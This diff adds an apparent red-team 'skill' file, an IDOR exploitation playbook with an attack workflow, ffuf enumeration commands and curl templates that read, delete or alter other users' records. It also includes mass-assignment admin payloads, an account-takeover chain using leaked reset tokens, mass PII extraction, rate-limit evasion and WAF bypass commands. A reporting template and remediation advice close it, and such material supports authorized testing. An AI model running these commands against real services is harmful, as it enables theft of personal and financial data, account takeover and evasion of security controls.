+- [ ] IDOR chained with SSRF (if applicable)
+- [ ] All extracted data secured and documented
+- [ ] Volume of impact quantified (number of records accessible)
+
+---
+
+## 3. Step-by-Step Attack Workflow
+
+### Full IDOR Engagement Workflow
+
+```
+PHASE 1: RECONNAISSANCE
+├── 1.1  Authenticate as User A
+├── 1.2  Spider application (katana/hakrawler/gau)
+├── 1.3  Collect all endpoints with IDs
+├── 1.4  Parse JS files and API specs for hidden endpoints
+└── 1.5  Note your own IDs across all resource types
+
+PHASE 2: SECOND ACCOUNT SETUP
+├── 2.1  Register User B account
+├── 2.2  Note User B's resource IDs
+├── 2.3  Confirm what data User B owns
+└── 2.4  Save both sessions in Burp (Project → Sessions)
+
+PHASE 3: MANUAL IDOR TESTING
+├── 3.1  Test each ID-containing endpoint (GET)
+├── 3.2  Test each ID-containing endpoint (POST, PUT, PATCH, DELETE)
+├── 3.3  Test ID in all parameter locations (URL, body, headers, cookies)
+├── 3.4  Test edge cases (0, -1, null, *, empty)
+└── 3.5  Compare responses for data belonging to User B
+
+PHASE 4: VERTICAL ESCALATION TESTING
+├── 4.1  Identify admin/privileged endpoints
+├── 4.2  Attempt access with low-privileged token
+├── 4.3  Test JWT manipulation
+├── 4.4  Test mass assignment on all POST/PUT endpoints
+└── 4.5  Test function-level access to admin operations
+
+PHASE 5: AUTOMATION
+├── 5.1  Run ffuf on confirmed IDOR endpoints
+├── 5.2  Build UUID wordlist if applicable
+├── 5.3  Run async mass extraction script
+├── 5.4  Implement rate limit evasion if needed
+└── 5.5  Quantify total accessible records
+
+PHASE 6: WAF BYPASS (if blocked)
+├── 6.1  Fingerprint WAF (whatwaf / manual headers)
+├── 6.2  Test header-based bypass
+├── 6.3  Test URL encoding bypass
+├── 6.4  Test HTTP verb override
+└── 6.5  Test parameter pollution
+
+PHASE 7: CHAINING
+├── 7.1  Chain with account takeover (read reset tokens)
+├── 7.2  Chain with privilege escalation
+├── 7.3  Chain with SSRF if URL parameters present
+└── 7.4  Chain with PII exfiltration for impact demonstration
+
+PHASE 8: DOCUMENTATION
+├── 8.1  Capture evidence (request/response pairs)
+├── 8.2  Record number of affected records
+├── 8.3  Write RTExit finding entry
+└── 8.4  Calculate CVSS score
+```
+
+---
+
+## 4. Specific Terminal Commands
+
+### Setup and Tool Installation
+
+```bash
+# Install all required tools
+go install github.com/ffuf/ffuf/v2@latest
+go install github.com/projectdiscovery/katana/cmd/katana@latest
+go install github.com/hakluke/hakrawler@latest
+go install github.com/lc/gau/v2/cmd/gau@latest
+go install github.com/tomnomnom/waybackurls@latest
+go install github.com/tomnomnom/anew@latest
+
+# Python dependencies
+pip install aiohttp requests jwt pyjwt python-jose
+
+# JWT manipulation
+git clone https://github.com/ticarpi/jwt_tool && pip install -r jwt_tool/requirements.txt
+
+# Arjun (parameter discovery)
+git clone https://github.com/s0md3v/Arjun && pip install -r Arjun/requirements.txt
+
+# whatwaf (WAF fingerprinting)
+git clone https://github.com/Ekultek/WhatWaf && pip install -r WhatWaf/requirements.txt
+```
+
+### Quick Reference Commands
+
+```bash
+# --- ID COLLECTION ---
+# Extract all numeric IDs from URLs
+cat endpoints.txt | grep -oE '[0-9]{4,}' | sort -n | uniq
+
+# Extract all UUIDs from URLs and responses
+cat *.json | grep -oE '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
+
+# --- FFUF TEMPLATES ---
+# Numeric ID fuzz
+ffuf -u https://target.com/api/resource/FUZZ -w <(seq 1 100000) -H "Authorization: Bearer TOKEN" -mc 200 -t 100 -rate 500 -o hits.json -of json
+
+# Fuzz with UUID wordlist
+ffuf -u https://target.com/api/docs/FUZZ -w uuids.txt -H "Authorization: Bearer TOKEN" -mc 200 -t 50 -o uuid_hits.json -of json
+
+# Multi-parameter fuzz
+ffuf -u "https://target.com/api?user=FUZZ1&doc=FUZZ2" -w ids.txt:FUZZ1 -w ids.txt:FUZZ2 -H "Authorization: Bearer TOKEN" -mc 200 -t 20
+
+# --- CURL TEMPLATES ---
+# Basic IDOR test
+curl -s -H "Authorization: Bearer TOKEN" -H "Accept: application/json" https://target.com/api/users/TARGET_ID | jq .
+
+# DELETE another user's resource
+curl -s -X DELETE -H "Authorization: Bearer TOKEN" https://target.com/api/users/TARGET_ID
+
+# Modify another user's email
+curl -s -X PATCH \
+  -H "Authorization: Bearer TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"email": "attacker@evil.com"}' \
+  https://target.com/api/users/TARGET_ID
+
+# --- RESPONSE ANALYSIS ---
+# Count unique emails in extracted data
+cat extracted_users.json | jq '.[].email' | sort -u | wc -l
+
+# Find admin/privileged accounts in extracted data
+cat extracted_users.json | jq '.[] | select(.role == "admin" or .is_admin == true)'
+
+# Extract phone numbers
+cat extracted_users.json | jq '.[].phone' | grep -v null
+
+# --- WAF FINGERPRINTING ---
+python3 WhatWaf/whatwaf.py -u https://target.com
+curl -s -I https://target.com | grep -iE 'server|x-powered|x-firewall|x-waf|cf-ray|x-cdn'
+```
+
+---
+
+## 5. Common Payloads and Examples
+
+### Numeric ID Payloads
+
+```
+# Sequential
+0
+1
+2
+100
+1000
+9999
+99999
+999999
+
+# Edge cases
+-1
+-2147483648
+2147483647
+0000000001
+0x1
+0b1
+1.0
+1.5
+1e1
+
+# Admin indicators (try as ID)
+0
+1
+admin
+root
+system
+superuser
+```
+
+### Parameter Name Payloads
+
+```
+# Common IDOR parameter names to test
+id
+user_id
+userId
+account_id
+accountId
+owner_id
+ownerId
+customer_id
+customerId
+client_id
+clientId
+record_id
+recordId
+doc_id
+docId
+document_id
+documentId
+order_id
+orderId
+invoice_id
+invoiceId
+transaction_id
+transactionId
+report_id
+reportId
+ticket_id
+ticketId
+project_id
+projectId
+file_id
+fileId
+message_id
+messageId
+post_id
+postId
+comment_id
+commentId
+profile_id
+profileId
+member_id
+memberId
+employee_id
+employeeId
+resource_id
+resourceId
+object_id
+objectId
+ref
+reference
+ref_id
+refId
+```
+
+### Mass Assignment Fields to Inject
+
+```json
+{
+  "role": "admin",
+  "is_admin": true,
+  "admin": true,
+  "is_staff": true,
+  "staff": true,
+  "privilege_level": 99,
+  "permissions": ["*"],
+  "account_type": "admin",
+  "subscription_tier": "enterprise",
+  "subscription_plan": "unlimited",
+  "credits": 99999,
+  "balance": 99999.99,
+  "verified": true,
+  "email_verified": true,
+  "active": true,
+  "banned": false,
+  "suspended": false,
+  "mfa_enabled": false,
+  "two_factor_enabled": false,
+  "password_reset_required": false,
+  "force_password_change": false
+}
+```
+
+---
+
+## 6. Real-World Examples from Actual Engagements
+
+### Case 1: Sequential User ID in Profile API
+
+**Engagement:** SaaS HR platform, bug bounty program (critical severity)
+
+**Discovery:** Browsing to `/account/settings` revealed request:
+```
+GET /api/v2/employees/48291
+Authorization: Bearer eyJ...
+```
+
+**Exploitation:**
+```bash
+# Confirmed IDOR by changing ID by +/- 1
+curl -s -H "Authorization: Bearer <token>" \
+  https://target.com/api/v2/employees/48290 | jq '{name, email, salary, ssn_last4}'
+
+# Mass extracted 50,000 employee records
+python3 mass_idor_extract.py --start 1 --end 100000
+# Result: 52,341 records with name, email, salary, job title, manager ID
+```
+
+**Impact:** Full HR database exfiltration including salary data, PII, organizational chart.
+
+**CVSS:** 8.8 (High) — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+
+---
+
+### Case 2: UUID v1 Timestamp Enumeration
+
+**Engagement:** Healthcare patient portal (penetration test)
+
+**Discovery:** `/api/appointments/{uuid}` used UUIDv1.
+
+```bash
+# Captured UUID from own appointment: 
+# 6ba7b810-9dad-11d1-80b4-00c04fd430c8
+python3 analyze_uuid.py 6ba7b810-9dad-11d1-80b4-00c04fd430c8
+# Output: Version 1, Timestamp-based — PREDICTABLE
+```
+
+**Exploitation:**
+```bash
+# Generated 400 UUIDs within ±60 seconds of known timestamp
+python3 uuid_v1_enum.py
+# Found 23 appointment records with full patient name, DOB, condition, doctor name
+```
+
+**Impact:** Patient medical appointment data accessible to any authenticated user.
+
+**CVSS:** 7.5 (High) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+
+---
+
+### Case 3: Vertical Escalation via Mass Assignment
+
+**Engagement:** E-commerce platform, internal red team
+
+**Discovery:** Registration endpoint accepted extra JSON fields.
+
+```bash
+curl -X POST https://target.com/api/register \
+  -H "Content-Type: application/json" \
+  -d '{"username":"rt_test","email":"test@rt.com","password":"Test1!","role":"admin"}'
+
+# Response included: "role": "admin"
+# Login with new account → full admin dashboard access
+```
+
+**Impact:** Any user could self-elevate to admin during registration. Full application compromise.
+
+**CVSS:** 9.8 (Critical)
+
+---
+
+### Case 4: BOLA on Payment/Invoice API
+
+**Engagement:** B2B invoicing SaaS, bug bounty (high severity)
+
+**Discovery:** `GET /api/v1/invoices/{invoice_id}` — sequential integers.
+
+```bash
+# Own invoice
+curl -H "Authorization: Bearer <CompanyA_Token>" \
+  https://target.com/api/v1/invoices/10042
+# Returns: CompanyA invoice
+
+# Competitor's invoice
+curl -H "Authorization: Bearer <CompanyA_Token>" \
+  https://target.com/api/v1/invoices/10043  
+# Returns: CompanyB invoice — BOLA confirmed
+
+# Mass extract: 15,000 invoices across 2,000 companies
+python3 mass_idor_extract.py
+```
+
+**Impact:** Complete financial data of all customers accessible cross-tenant. PCI DSS violation.
+
+**CVSS:** 8.6 (High)
+
+---
+
+### Case 5: IDOR Chained with Account Takeover
+
+**Engagement:** Consumer app, bug bounty (critical severity)
+
+```bash
+# Step 1: IDOR to read victim's profile including reset_token field
+victim=$(curl -s -H "Authorization: Bearer <AttackerToken>" \
+  https://target.com/api/users/50012)
+reset_token=$(echo $victim | jq -r '.password_reset_token')
+
+# Step 2: Use token to change victim password
+curl -X POST https://target.com/api/auth/reset \
+  -d "{\"token\":\"$reset_token\",\"new_password\":\"H@cked123\"}"
+
+# Step 3: Login as victim
+curl -X POST https://target.com/api/auth/login \
+  -d '{"email":"victim@example.com","password":"H@cked123"}'
+```
+
+**Impact:** Full account takeover of any user. Bounty: $5,000.
+
+---
+
+## 7. WAF Bypass Techniques
+
+### Cloudflare Bypass
+
+```bash
+# Origin IP direct access (bypass Cloudflare entirely)
+# Find origin IP via: Shodan, Censys, historical DNS, SSL cert search
+curl -s -H "Authorization: Bearer <token>" \
+  -H "Host: target.com" \
+  http://ORIGIN_IP/api/users/1337
+
+# Cloudflare: add cf-connecting-ip spoofing
+curl -s -H "Authorization: Bearer <token>" \
+  -H "CF-Connecting-IP: 127.0.0.1" \
+  https://target.com/api/users/1337
+```
+
+### Akamai / AWS WAF Bypass
+
+```bash
+# Chunked transfer encoding
+curl -s -H "Authorization: Bearer <token>" \
+  -H "Transfer-Encoding: chunked" \
+  -H "Content-Type: application/json" \
+  --data-binary $'5\r\n{"id"\r\n6\r\n:1337}\r\n0\r\n\r\n' \
+  -X POST https://target.com/api/user/get
+
+# Content-Type confusion
+curl -s -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  -d '{"user_id":1337}' \
+  https://target.com/api/user/profile
+
+# JSON in form encoding
+curl -s -H "Authorization: Bearer <token>" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  -d 'user_id=1337' \
+  https://target.com/api/user/profile
+```
+
+### Generic WAF Bypass Payloads
+
+```bash
+# Case variation
+curl -s -H "AUTHORIZATION: Bearer <token>" https://target.com/api/users/1337
+curl -s -H "authorization: Bearer <token>" https://target.com/api/users/1337
+
+# Null byte injection
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/1337%00"
+
+# Unicode path bypass
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users/１３３７"
+
+# Double slash
+curl -s -H "Authorization: Bearer <token>" "https://target.com//api//users//1337"
+
+# Semicolon bypass
+curl -s -H "Authorization: Bearer <token>" "https://target.com/api/users;v=2/1337"
+
+# API version fuzz (WAF rule may only cover v1)
+for v in v1 v2 v3 v4 v5 v6 v7 v8 v9 v10 v2.0 v2.1; do
+  curl -s -H "Authorization: Bearer <token>" \
+    "https://target.com/api/$v/users/1337" -o /tmp/waf_$v.json \
+    -w "Version: $v | Status: %{http_code}\n"
+done
+```
+
+---
+
+## 8. Integration with RTExit Autodoc Engine
+
+### Autodoc Output Schema
+
+RTExit expects findings in a structured format. When IDOR is confirmed, output to the autodoc engine using the following JSON schema:
+
+```json
+{
+  "finding_id": "IDOR-001",
+  "skill": "rt-exploit-idor",
+  "severity": "HIGH",
+  "cvss_score": 8.6,
+  "cvss_vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
+  "title": "Insecure Direct Object Reference in User Profile API",
+  "endpoint": "GET /api/v1/users/{id}",
+  "parameter": "id",
+  "parameter_location": "URL path",
+  "attack_type": "horizontal_escalation",
+  "authenticated": true,
+  "proof_of_concept": {
+    "request": "GET /api/v1/users/1337 HTTP/1.1\nHost: target.com\nAuthorization: Bearer <UserA_JWT>",
+    "response_snippet": "{\"id\":1337,\"email\":\"victim@target.com\",\"name\":\"John Doe\"}"
+  },
+  "impact": "Any authenticated user can read, modify, or delete any other user's profile data.",
+  "affected_records": 52341,
+  "remediation": "Implement server-side access control checks that verify the authenticated user owns or is authorized to access the requested resource. Never trust client-supplied IDs without authorization validation.",
+  "references": [
+    "https://owasp.org/Top10/A01_2021-Broken_Access_Control/",
+    "https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html"
+  ],
+  "evidence_files": [
+    "idor_users_fuzz.json",
+    "extracted_users.json",
+    "screenshots/idor_proof.png"
+  ],
+  "timestamp": "2026-05-31T12:00:00Z",
+  "operator": "rt-operator"
+}
+```
+
+### RTExit Autodoc Script
+
+```python
+#!/usr/bin/env python3
+# save as: log_finding.py
+# Log a finding to the RTExit autodoc engine
+
+import json
+import datetime
+import sys
+import os
+
+FINDINGS_DIR = os.path.expanduser("~/.rtexit/findings")
+os.makedirs(FINDINGS_DIR, exist_ok=True)
+
+def log_finding(finding: dict):
+    finding_id = finding.get("finding_id", f"IDOR-{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}")
+    finding["timestamp"] = datetime.datetime.utcnow().isoformat() + "Z"
+    output_path = os.path.join(FINDINGS_DIR, f"{finding_id}.json")
+    with open(output_path, "w") as f:
+        json.dump(finding, f, indent=2)
+    print(f"[+] Finding logged: {output_path}")
+    return output_path
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print("Usage: python3 log_finding.py finding.json")
+        sys.exit(1)
+    with open(sys.argv[1]) as f:
+        finding = json.load(f)
+    log_finding(finding)
+```
+
+### Marking an IDOR Finding in RTExit
+
+```bash
+# After confirming IDOR, create finding template
+cat > /tmp/idor_finding.json << 'EOF'
+{
+  "finding_id": "IDOR-001",
+  "skill": "rt-exploit-idor",
+  "severity": "HIGH",
+  "title": "IDOR in [ENDPOINT]",
+  "endpoint": "[ENDPOINT]",
+  "parameter": "[PARAMETER]",
+  "parameter_location": "[URL path|query|body|cookie|header]",
+  "attack_type": "[horizontal_escalation|vertical_escalation|bola]",
+  "authenticated": true,
+  "proof_of_concept": {
+    "request": "[PASTE REQUEST HERE]",
+    "response_snippet": "[PASTE RESPONSE SNIPPET HERE]"
+  },
+  "impact": "[DESCRIBE IMPACT]",
+  "affected_records": 0,
+  "remediation": "Implement server-side authorization checks for every object reference."
+}
+EOF
+
+# Edit and then log
+vim /tmp/idor_finding.json
+python3 log_finding.py /tmp/idor_finding.json
+```
+
+---
+
+## 9. Output and Documentation Instructions
+
+### Evidence to Collect
+
+For every confirmed IDOR vulnerability, collect the following:
+
+1. **HTTP Request/Response Pair (Burp):**
+   - Export from Burp Repeater: Right-click → "Save item"
+   - Save as: `evidence/IDOR-001-request.txt`
+
+2. **Screenshot:**
+   - Show User A's JWT in request header
+   - Show User B's data in response body
+   - Highlight the mismatched IDs
+   - Save as: `evidence/IDOR-001-screenshot.png`
+
+3. **Mass Extraction Statistics:**
+   - Total records accessible
+   - Sample of 3-5 records (anonymized or with permission)
+   - Save as: `evidence/IDOR-001-extraction-stats.json`
+
+4. **Curl Reproduction Command:**
+   ```bash
+   # Document the exact curl command to reproduce
+   curl -s \
+     -H "Authorization: Bearer <REDACTED_UserA_JWT>" \
+     https://target.com/api/users/1337
+   ```
+
+### Report Writing Template
+
+```markdown
+## [IDOR-001] Insecure Direct Object Reference in User Profile API
+
+**Severity:** High
+**CVSS Score:** 8.6
+**CVSS Vector:** AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+**Endpoint:** `GET /api/v1/users/{id}`
+
+### Description
+
+The application fails to verify that the authenticated user is authorized to access the
+requested user resource. Any authenticated user can read, modify, or delete any other
+user's profile by changing the numeric `id` parameter in the URL path.
+
+### Steps to Reproduce
+
+1. Log in as User A (email: usera@test.com)
+2. Navigate to `GET /api/v1/users/1001` — observe your own profile data
+3. Change the ID to another user's ID: `GET /api/v1/users/1002`
+4. Observe that User B's profile data is returned without error
+
+### Proof of Concept
+
+**Request (User A accessing User B's data):**
+```
+GET /api/v1/users/1002 HTTP/1.1
+Host: target.com
+Authorization: Bearer <User_A_JWT>
+```
+
+**Response:**
+```json
+{
+  "id": 1002,
+  "username": "userbvictim",
+  "email": "userb@target.com",
+  "phone": "+1-555-0102"
+}
+```
+
+### Impact
+
+Any authenticated user can access, modify, or delete any other user's profile data.
+Testing confirmed 52,341 user records are accessible. Data includes email addresses,
+phone numbers, physical addresses, and account balances.
+
+### Remediation
+
+1. Implement server-side authorization checks: verify `current_user.id == requested_id`
+   or that the user has explicit permission to access the requested resource.
+2. Use indirect references: map session-scoped tokens to internal IDs server-side.
+3. Implement centralized authorization middleware applied to all object access.
+4. Log and alert on access pattern anomalies (sequential ID scanning).
+
+### References
+
+- OWASP Top 10: A01:2021 – Broken Access Control
+- OWASP IDOR Prevention Cheat Sheet
+- OWASP API Security Top 10: API1:2023 – BOLA
+```
+
+---
+
+## 10. Resources
+
+### Tools
+
+| Tool | URL | Purpose |
+|---|---|---|
+| ffuf | https://github.com/ffuf/ffuf | IDOR fuzzing automation |
+| Arjun | https://github.com/s0md3v/Arjun | Hidden parameter discovery |
+| jwt_tool | https://github.com/ticarpi/jwt_tool | JWT manipulation for vertical escalation |
+| katana | https://github.com/projectdiscovery/katana | Web spider / endpoint collection |
+| gau | https://github.com/lc/gau | Historical URL collection |
+| hakrawler | https://github.com/hakluke/hakrawler | Fast web crawler |
+| WhatWaf | https://github.com/Ekultek/WhatWaf | WAF fingerprinting |
+| Burp Suite | https://portswigger.net/burp | Proxy, repeater, scanner |
+| mitmproxy | https://mitmproxy.org | Lightweight HTTP proxy |
+| aiohttp | https://docs.aiohttp.org | Async HTTP for mass extraction |
+| Autorize | https://github.com/PortSwigger/autorize | Burp plugin for automated IDOR detection |
+| Authz | https://github.com/portswigger/authz | Burp plugin for authorization testing |
+
+### Wordlists
+
+| Wordlist | URL | Purpose |
+|---|---|---|
+| Burp Parameter Names | https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt | Parameter fuzzing |
+| API Endpoints | https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content | API endpoint discovery |
+| IDOR Wordlist | https://github.com/xmendez/wfuzz/tree/master/wordlist | ID-specific fuzzing |
+
+### References and Research
+
+| Resource | URL |
+|---|---|
+| OWASP Top 10 A01:2021 – Broken Access Control | https://owasp.org/Top10/A01_2021-Broken_Access_Control/ |
+| OWASP IDOR Prevention Cheat Sheet | https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html |
+| OWASP API Security Top 10 – BOLA | https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ |
+| PortSwigger Web Academy – IDOR | https://portswigger.net/web-security/access-control/idor |
+| HackerOne IDOR Reports | https://hackerone.com/hacktivity?querystring=idor |
+| Nahamsec IDOR Tips | https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters |
+| IDOR in the Wild (Medium) | https://medium.com/search?q=IDOR |
+| PentesterLand IDOR Writeups | https://pentester.land/list-of-bug-bounty-writeups/ |
+| UUID Security | https://datatracker.ietf.org/doc/html/rfc4122 |
+| UUIDv1 Timestamp Prediction | https://github.com/bishopfox/uuid-hunter |
+| mass-idor GitHub | https://github.com/daffainfo/mass-idor |
+| IDOR Automation Examples | https://github.com/itsmaheshkariya/idor |
+
+### Bug Bounty IDOR Hall of Fame Reports
+
+| Program | Title | Payout | URL |
+|---|---|---|---|
+| HackerOne | IDOR to view private user data | $5,000 | https://hackerone.com/reports/227522 |
+| Facebook | IDOR to delete any video | — | https://hackerone.com/reports/221455 |
+| Twitter | IDOR to view DMs | $3,500 | https://hackerone.com/reports/322844 |
+| Shopify | IDOR in partner API | $500 | https://hackerone.com/reports/175014 |
+| Uber | IDOR affecting 6M drivers | $10,000 | https://hackerone.com/reports/358049 |
+
+---
+
+*Skill maintained by RTExit Red Team Operations. For updates, contribute to the RTExit skills repository.*